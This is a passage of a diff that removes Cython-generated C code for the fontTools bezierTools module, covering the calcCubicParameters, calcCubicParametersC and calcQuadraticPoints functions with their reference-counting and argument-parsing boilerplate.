__pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":959 - * by = (y3 - y2) * 3.0 - cy - * ax = x4 - dx - cx - bx - * ay = y4 - dy - cy - by # <<<<<<<<<<<<<< - * return (ax, ay), (bx, by), (cx, cy), (dx, dy) - * - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y4, __pyx_v_dy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 959, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 959, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 959, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":960 - * ax = x4 - dx - cx - bx - * ay = y4 - dy - cy - by - * return (ax, ay), (bx, by), (cx, cy), (dx, dy) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_ax); - __Pyx_GIVEREF(__pyx_v_ax); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_ax)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_ay); - __Pyx_GIVEREF(__pyx_v_ay); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_ay)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_bx); - __Pyx_GIVEREF(__pyx_v_bx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_bx)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_by); - __Pyx_GIVEREF(__pyx_v_by); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_by)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_cx); - __Pyx_GIVEREF(__pyx_v_cx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_cx)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_cy); - __Pyx_GIVEREF(__pyx_v_cy); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_cy)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_dx); - __Pyx_GIVEREF(__pyx_v_dx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_dx)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_dy); - __Pyx_GIVEREF(__pyx_v_dy); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_v_dy)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_1)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_2)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_3)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_5); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_5)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_5 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XDECREF(__pyx_v_x4); - __Pyx_XDECREF(__pyx_v_y4); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":963 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.locals( - */ - -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicParametersC(__pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4) { - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_c; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicParametersC", 1); - - /* "fontTools/misc/bezierTools.py":975 - * ) - * def calcCubicParametersC(pt1, pt2, pt3, pt4): - * c = (pt2 - pt1) * 3.0 # <<<<<<<<<<<<<< - * b = (pt3 - pt2) * 3.0 - c - * a = pt4 - pt1 - c - b - */ - __pyx_v_c = __Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1), __pyx_t_double_complex_from_parts(3.0, 0)); - - /* "fontTools/misc/bezierTools.py":976 - * def calcCubicParametersC(pt1, pt2, pt3, pt4): - * c = (pt2 - pt1) * 3.0 - * b = (pt3 - pt2) * 3.0 - c # <<<<<<<<<<<<<< - * a = pt4 - pt1 - c - b - * return (a, b, c, pt1) - */ - __pyx_v_b = __Pyx_c_diff_double(__Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt2), __pyx_t_double_complex_from_parts(3.0, 0)), __pyx_v_c); - - /* "fontTools/misc/bezierTools.py":977 - * c = (pt2 - pt1) * 3.0 - * b = (pt3 - pt2) * 3.0 - c - * a = pt4 - pt1 - c - b # <<<<<<<<<<<<<< - * return (a, b, c, pt1) - * - */ - __pyx_v_a = __Pyx_c_diff_double(__Pyx_c_diff_double(__Pyx_c_diff_double(__pyx_v_pt4, __pyx_v_pt1), __pyx_v_c), __pyx_v_b); - - /* "fontTools/misc/bezierTools.py":978 - * b = (pt3 - pt2) * 3.0 - c - * a = pt4 - pt1 - c - b - * return (a, b, c, pt1) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_a); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pt1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1)) __PYX_ERR(0, 978, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_2)) __PYX_ERR(0, 978, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 978, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_4)) __PYX_ERR(0, 978, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":963 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.locals( - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicParametersC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = 0; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_55calcQuadraticPoints(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_54calcQuadraticPoints, "calcQuadraticPoints(a, b, c)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_55calcQuadraticPoints = {"calcQuadraticPoints", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_55calcQuadraticPoints, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_54calcQuadraticPoints}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_55calcQuadraticPoints(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticPoints (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 981, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 981, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticPoints", 1, 3, 3, 1); __PYX_ERR(0, 981, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 981, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticPoints", 1, 3, 3, 2); __PYX_ERR(0, 981, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticPoints") < 0)) __PYX_ERR(0, 981, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticPoints", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 981, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_54calcQuadraticPoints(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_54calcQuadraticPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_x1 = NULL; - PyObject *__pyx_v_y1 = NULL; - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticPoints", 1); - - /* "fontTools/misc/bezierTools.py":982 - * - * def calcQuadraticPoints(a, b, c): - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = __pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 982, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 982, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 982, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 982, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 982, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 982, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_ay = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":983 - * def calcQuadraticPoints(a, b, c): - * ax, ay = a - * bx, by = b # <<<<<<<<<<<<<< - * cx, cy = c - * x1 = cx - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 983, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 983, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 983, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 983, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 983, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 983, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_by = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":984 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * x1 = cx - * y1 = cy - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 984, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 984, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 984, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 984, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 984, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 984, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_cy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":985 - * bx, by = b - * cx, cy = c - * x1 = cx # <<<<<<<<<<<<<< - * y1 = cy - * x2 = (bx * 0.5) + cx - */ - __Pyx_INCREF(__pyx_v_cx); - __pyx_v_x1 = __pyx_v_cx; - - /* "fontTools/misc/bezierTools.py":986 - * cx, cy = c - * x1 = cx - * y1 = cy # <<<<<<<<<<<<<< - * x2 = (bx * 0.5) + cx - * y2 = (by * 0.5) + cy - */ - __Pyx_INCREF(__pyx_v_cy); - __pyx_v_y1 = __pyx_v_cy; - - /* "fontTools/misc/bezierTools.py":987 - * x1 = cx - * y1 = cy - * x2 = (bx * 0.5) + cx # <<<<<<<<<<<<<< - * y2 = (by * 0.5) + cy - * x3 = ax + bx + cx - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_bx, __pyx_float_0_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 987, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 987, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":988 - * y1 = cy - * x2 = (bx * 0.5) + cx - * y2 = (by * 0.5) + cy # <<<<<<<<<<<<<< - * x3 = ax + bx + cx - * y3 = ay + by + cy - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_by, __pyx_float_0_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 988, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 988, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_y2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":989 - * x2 = (bx * 0.5) + cx - * y2 = (by * 0.5) + cy - * x3 = ax + bx + cx # <<<<<<<<<<<<<< - * y3 = ay + by + cy - * return (x1, y1), (x2, y2), (x3, y3) - */ - __pyx_t_2 = PyNumber_Add(__pyx_v_ax, __pyx_v_bx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 989, __pyx_L1_error) - 